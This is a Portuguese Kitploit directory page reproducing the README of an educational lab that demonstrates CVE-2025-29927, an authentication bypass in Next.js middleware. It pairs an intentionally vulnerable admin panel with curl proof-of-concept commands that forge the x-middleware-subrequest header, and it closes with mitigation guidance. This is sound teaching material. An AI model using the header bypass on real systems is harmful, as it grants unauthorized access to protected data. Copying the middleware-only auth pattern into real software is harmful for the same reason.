Skip to content
KitploitKITPLOIT
FerramentasBlog
Enviar
FerramentasBlog
Enviar

Ferramentas de Hacking, PenTest e Cibersegurança para o seu Arsenal de Segurança!

Kitploit é um diretório de ferramentas de hacking, cibersegurança e pentesting. Descubra as últimas atualizações de projetos para encontrar vulnerabilidades, analisar sistemas, automatizar testes e fortalecer sua segurança.

··Feeds·Contato·Privacidade·© 2026 Kitploit

Diretório de Ferramentas

Categorias

Ver todas as categorias
Loading categories
cve-2025-29927-nextjs — Demonstração educacional do CVE-2025-29927, uma bypass crítica de autenticação de middleware no Next.js. Inclui um painel de administração vulnerável, comandos de exploit de prova de conceito e orientações de mitigação para treinamento de segurança. | Kitploit
Ferramentas/GitHubGitHub/gitgudkrish/cve-2025-29927-nextjs
Análise de VulnerabilidadesExploração de Aplicações WebSegurança WebTestes de PenetraçãoAutenticaçãoAprendizado e Educação
GitHubgitgudkrish/cve-2025-29927-nextjs

cve-2025-29927-nextjs

Demonstração educacional do CVE-2025-29927, uma bypass crítica de autenticação de middleware no Next.js. Inclui um painel de administração vulnerável, comandos de exploit de prova de conceito e orientações de mitigação para treinamento de segurança.

Ver Repositório
2há 3 mesesAinda não revisado

Mais Populares

Ver todos →

Descubra as ferramentas mais usadas pela nossa comunidade.

Explore todas as ferramentas

Navegue pela nossa coleção de ferramentas

Ver todas as ferramentas →
Compartilhar

Painel de Administração Himalaya Tech — Demonstração CVE-2025-29927

AVISO: Esta aplicação é intencionalmente vulnerável. Apenas para fins educacionais e autorizados de pesquisa em segurança. NÃO implante em um servidor público.


Sobre Esta Demonstração

Este aplicativo demonstra a CVE-2025-29927, uma vulnerabilidade crítica de bypass de autenticação no middleware do Next.js (CVSS 9.1). A aplicação simula um painel de administração corporativo realista para a empresa fictícia "Himalaya Tech Pvt. Ltd." — tornando o impacto do bypass visualmente impactante.

Todos os registros de funcionários, chaves de API, credenciais de banco de dados e outros dados "sensíveis" mostrados são totalmente fictícios e simulados — gerados apenas para demonstração educacional.


CVE-2025-29927 — Resumo da Vulnerabilidade

CampoDetalhe
ID do CVECVE-2025-29927
SeveridadeCrítico (CVSS 9.1)
AfetadoNext.js ≤ 14.2.29, Next.js ≤ 15.2.2
Corrigido emNext.js 14.2.30, 15.2.3
TipoBypass de autenticação do middleware via manipulação de cabeçalho HTTP

Causa Raiz

O Next.js usa um cabeçalho HTTP interno x-middleware-subrequest para rastrear chamadas recursivas de middleware e evitar loops infinitos. Em versões vulneráveis, um atacante pode forjar este cabeçalho em uma requisição externa. Quando o cabeçalho está presente e corresponde ao identificador do middleware, o runtime do Next.js pula o middleware completamente, incluindo toda a lógica de autenticação definida dentro dele.

Impacto

Qualquer aplicação que dependa exclusivamente de middleware.ts para proteger rotas (um padrão comum e recomendado do Next.js) está vulnerável. Um atacante não autenticado pode acessar qualquer página protegida simplesmente adicionando um cabeçalho HTTP.


Prova de Conceito

Requisição normal (bloqueada — redireciona para /login)

root@kitploit:~
curl -v http://localhost:3000/admin
# → 307 Redirect to /login

Requisição de bypass (bem-sucedida — retorna página de admin completa)

root@kitploit:~
curl -v \
  -H "x-middleware-subrequest: middleware" \
  http://localhost:3000/admin

# → 200 OK — HTML completo do painel de admin retornado, sem autenticação necessária

Acessando rotas protegidas aninhadas

root@kitploit:~
# Página de usuários do admin
curl -H "x-middleware-subrequest: middleware" http://localhost:3000/admin/users

# Configurações do sistema com "credenciais de produção"
curl -H "x-middleware-subrequest: middleware" http://localhost:3000/admin/settings

Usando um navegador (via Burp Suite / extensão de navegador)

Adicione o cabeçalho da requisição x-middleware-subrequest: middleware a qualquer requisição para /admin/* e a verificação do middleware será ignorada.


Por Que Este App Está Vulnerável

middleware.ts é o único mecanismo de proteção:

root@kitploit:~
// middleware.ts
export function middleware(request: NextRequest) {
  if (pathname.startsWith("/admin")) {
    const token = request.cookies.get("auth-token")?.value;
    if (!token || token !== "valid-session-xyz123") {
      return NextResponse.redirect(loginUrl); // ← this entire function is skipped
    }
  }
  return NextResponse.next();
}

Os próprios componentes da página (ex.: app/admin/page.tsx) não contêm nenhuma verificação de autenticação — intencionalmente, para refletir aplicações do mundo real que seguem o padrão de proteção apenas por middleware.


Configuração & Execução

Pré-requisitos

  • Node.js 18+
  • npm ou yarn

Instalação

root@kitploit:~
npm install

Executar servidor de desenvolvimento

root@kitploit:~
npm run dev

O aplicativo estará disponível em http://localhost:3000.

Rotas

RotaAutenticação NecessáriaDescrição
/NãoPágina pública inicial
/loginNãoFormulário de login
/adminSim*Painel de administração com dados sensíveis
/admin/usersSim*Gerenciamento de usuários
/admin/settingsSim*Configurações do sistema e credenciais

*Protegido apenas pelo middleware – ignorado pelo CVE-2025-29927.

Credenciais de demonstração (fluxo de login normal)

  • Email: [email protected]
  • Senha: Admin@2024

Mitigação

  1. Atualize o Next.js para 14.2.30+ ou 15.2.3+.
  2. Defesa em profundidade: Adicione verificações de autenticação no lado do servidor dentro dos componentes de página/manipuladores de rota, não apenas no middleware. O middleware deve ser tratado como uma otimização de UX, não como um limite de segurança.
  3. Remova o cabeçalho no seu proxy reverso/CDN antes que as requisições cheguem ao Next.js.

Aviso Legal

Esta aplicação é fornecida apenas para fins educacionais, especificamente para demonstrar o impacto real do CVE-2025-29927 em um contexto de curso de segurança ética. Todos os dados (registros de funcionários, chaves de API, credenciais) são totalmente fictícios. Não use esta aplicação de demonstração ou as técnicas aqui demonstradas contra sistemas que você não possui ou para os quais não possui permissão explícita para testar.

Baixar ferramenta